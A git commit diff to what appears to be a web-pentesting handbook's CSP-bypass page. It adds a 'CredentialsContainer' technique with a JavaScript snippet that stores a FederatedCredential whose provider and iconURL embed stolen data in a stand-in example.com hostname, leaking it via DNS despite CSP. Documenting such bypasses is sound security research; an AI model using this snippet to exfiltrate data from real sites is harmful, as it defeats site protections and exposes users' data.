Add CSP Exfiltration Bypass Technic by CredentialsContainer

2025-10-10 18:36:50 +00:00 · 2025-01-19 07:44:44 +09:00 · 2025-01-19 07:44:44 +09:00 · b8d5b73ea4
commit b8d5b73ea4
parent 04f453fea8
1 changed files with 16 additions and 0 deletions
--- a/src/pentesting-web/content-security-policy-csp-bypass/README.md
+++ b/src/pentesting-web/content-security-policy-csp-bypass/README.md
@ -794,6 +794,22 @@ var pc = new RTCPeerConnection({
 pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);
 ```

+### CredentialsContainer
+
+The credential popup sends a DNS request to the iconURL without being restricted by the page. It only works in a secure context (HTTPS) or on localhost.
+
+```javascript
+navigator.credentials.store(
+  new FederatedCredential({
+    id:"satoki", 
+    name:"satoki", 
+    provider:"https:"+your_data+"example.com", 
+    iconURL:"https:"+your_data+"example.com"
+    })
+  )
+```
+
+
 ## Checking CSP Policies Online

 - [https://csp-evaluator.withgoogle.com/](https://csp-evaluator.withgoogle.com)